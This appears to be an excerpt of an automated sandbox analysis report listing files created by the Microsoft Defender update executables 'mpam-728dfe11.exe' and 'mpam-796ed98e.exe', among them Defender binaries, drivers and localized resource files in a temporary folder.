Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpClient.dll Jump to dropped file
